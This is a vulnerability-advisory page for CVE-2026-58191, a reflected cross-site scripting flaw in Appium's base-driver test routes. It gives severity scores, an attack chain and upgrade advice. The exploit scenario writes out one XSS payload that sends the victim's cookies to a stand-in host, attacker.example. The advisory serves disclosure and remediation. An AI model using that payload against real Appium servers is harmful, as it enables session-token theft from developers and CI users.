Skip to main content

Appium CVE-2026-58191

| EUVDEUVD-2026-42425 MEDIUM
Cross-site Scripting (XSS) (CWE-79)
2026-07-08 security-advisories@github.com
6.1
CVSS 3.1 · NVD
Share

Severity by source

NVD PRIMARY
6.1 MEDIUM
AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
vuln.today AI
7.1 HIGH

Network-accessible routes, no attacker auth needed (PR:N), but victim must visit URL (UI:R); C:L added because XSS enables cookie and session token theft beyond integrity-only impact.

3.1 AV:N/AC:L/PR:N/UI:R/S:U/C:L/I:H/A:N
4.0 AV:N/AC:L/AT:N/PR:N/UI:A/VC:L/VI:H/VA:N/SC:N/SI:N/SA:N

Primary rating from NVD.

CVSS VectorNVD

CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
Attack Vector
Network
Attack Complexity
Low
Privileges Required
None
User Interaction
Required
Scope
Changed
Confidentiality
Low
Integrity
Low
Availability
None

Lifecycle Timeline

3
CVSS changed
Jul 15, 2026 - 20:37 NVD
6.5 (MEDIUM) 6.1 (MEDIUM)
Analysis Generated
Jul 08, 2026 - 22:23 vuln.today
Patch available
Jul 08, 2026 - 22:04 EUVD

DescriptionNVD

Appium is a cross-platform automation framework for all kinds of apps, built on top of the W3C WebDriver protocol. Prior to 10.7.0, Appium's base-driver unconditionally mounts the /test/guinea-pig, /test/guinea-pig-scrollable, and /test/guinea-pig-app-banner routes, and compileLodashTemplate reflects the throwError query parameter, comments POST field, and User-Agent request header into HTML without escaping, allowing reflected cross-site scripting and arbitrary JavaScript execution on the server origin. This issue is fixed in version 10.7.0.

AnalysisAI

Reflected cross-site scripting in Appium's base-driver allows unauthenticated remote attackers to execute arbitrary JavaScript in a victim's browser on the Appium server origin. All Appium installations prior to 10.7.0 unconditionally expose three test routes whose compileLodashTemplate handler reflects unsanitized user-controlled inputs - the throwError query parameter, the comments POST field, and the User-Agent request header - directly into rendered HTML without output encoding. …

Unlock full vulnerability intelligence

  • Risk assessment & exploitation conditions
  • Attack chain visualization
  • Remediation with exact patch versions
  • Threat intelligence from 22 sources
  • Personal watchlist & email alerts

Free forever · No credit card required

Attack ChainAIDerived

Hypothetical attack flow derived from CVE metadata

Access
Identify network-reachable Appium server < 10.7.0
Delivery
Craft URL to /test/guinea-pig with XSS payload in throwError parameter
Exploit
Deliver malicious URL to Appium user via phishing or redirect
Execution
Victim browser loads crafted URL against Appium origin
Persist
Injected JavaScript executes on server origin
Impact
Exfiltrate session tokens or perform origin-scoped actions

Vulnerability AssessmentAI

Exploitation The Appium server (prior to 10.7.0) must be network-reachable from the attacker - either directly via an exposed port, through an internal network the attacker has access to, or via SSRF from another reachable service. … Additional conditions and limiting factors are described in the full assessment.
Risk Assessment The vendor-provided CVSS 3.1 vector (AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:H/A:N, score 6.5) scores this as Medium severity, driven by the High integrity impact of arbitrary JavaScript execution and tempered by the required user interaction (UI:R). … Full risk analysis with EPSS, KEV, and SSVC signal comparison available after sign-in.
Exploit Scenario An attacker who can observe or predict that a developer or CI agent has a running Appium server on a reachable network interface crafts a URL targeting `/test/guinea-pig?throwError=<script>document.location='https://attacker.example/steal?c='+document.cookie</script>` and delivers it via phishing email, a malicious link in a Slack message, or an SSRF-capable redirect. When the victim's browser loads the URL against the Appium server origin, the injected script executes and exfiltrates any origin-scoped session material. …
Remediation Upgrade Appium to version 10.7.0 or later, which removes or properly escapes the reflected inputs in the affected test route handlers; this is the primary and confirmed fix per vendor advisory GHSA-3wgp-x9p5-c7cc at https://github.com/appium/appium/security/advisories/GHSA-3wgp-x9p5-c7cc. … Detailed patch versions, workarounds, and compensating controls in full report.

Threat intelligence, references, and detailed analysis are available after sign-in.

Share

CVE-2026-58191 vulnerability details – vuln.today

This site uses cookies essential for authentication and security. No tracking or analytics cookies are used. Privacy Policy